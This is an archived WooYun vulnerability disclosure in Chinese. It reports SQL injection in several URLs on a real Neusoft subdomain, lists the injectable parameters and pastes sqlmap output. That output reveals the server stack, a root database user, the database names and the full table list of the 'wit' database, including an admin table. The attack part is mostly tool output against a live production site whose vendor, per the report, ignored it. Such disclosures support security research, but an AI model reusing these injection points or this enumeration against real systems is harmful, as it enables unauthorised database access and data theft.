乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2012-11-08: 细节已通知厂商并且等待厂商处理中 2012-11-13: 厂商已经主动忽略漏洞,细节向公众公开
注入漏洞确实不少~~
http://huiju.neusoft.com/AboutUs/NewsLook.php?id=21'http://huiju.neusoft.com/xService/Index.php?id=7'http://huiju.neusoft.com/AboutUs/NewsListByType.php?tid=1'http://huiju.neusoft.com/Other/ClientList.php?tid=1'暂时就这么多把,随便访问其中一个都会有错误提示。
[11:09:23] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.9back-end DBMS: MySQL 5.0[11:09:23] [INFO] fetching current user[11:09:23] [INFO] resumed: root@%current user: 'root@%'[11:09:23] [INFO] fetching current database[11:09:23] [INFO] resumed: witcurrent database: 'wit'-------------------------------------------------------[11:10:14] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.9back-end DBMS: MySQL 5.0[11:10:14] [INFO] fetching database names[11:10:14] [INFO] the SQL query used returns 7 entries[11:10:14] [INFO] starting 7 threads[11:10:14] [INFO] resumed: information_schema[11:10:14] [INFO] resumed: Copy of news[11:10:14] [INFO] resumed: mysql[11:10:14] [INFO] resumed: news[11:10:14] [INFO] resumed: newsbak[11:10:14] [INFO] resumed: test[11:10:14] [INFO] resumed: witavailable databases [7]:[*] Copy of news[*] information_schema[*] mysql[*] news[*] newsbak[*] test[*] wit--------------------------------------------------[11:10:44] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.3.9back-end DBMS: MySQL 5.0[11:10:44] [INFO] fetching tables for database: 'wit'[11:10:45] [INFO] the SQL query used returns 50 entries[11:10:45] [INFO] starting 10 threadsDatabase: wit[50 tables]+--------------------+| abstruct || activitypic || admin || apply || applylist || applyoklist || clientcase || clientcaselist || clientcasetype || defaultpic || erpservicecase || erpservicecaselist || erpservicedoc || erpservicedoclist || erpserviceeoc || erpservicetype || jbosok || jobs || links || linkus || message || nether || news || newslist || newstype || noticedoc || noticelist || omservicecase || omservicecaselist || omservicedoc || omservicedoclist || omservicetype || position || positionlist || positiontype || pxinfolist || pxnews || pxnewstype || register || sendemail || temp_tab || uniontype || xservicecase || xservicecaselist || xservicedoc || xservicedoclist || xservicetype || zlinfolist || zlnews || zlnewstype |+--------------------+
你们懂的
危害等级:无影响厂商忽略
忽略时间:2012-11-13 14:35
暂无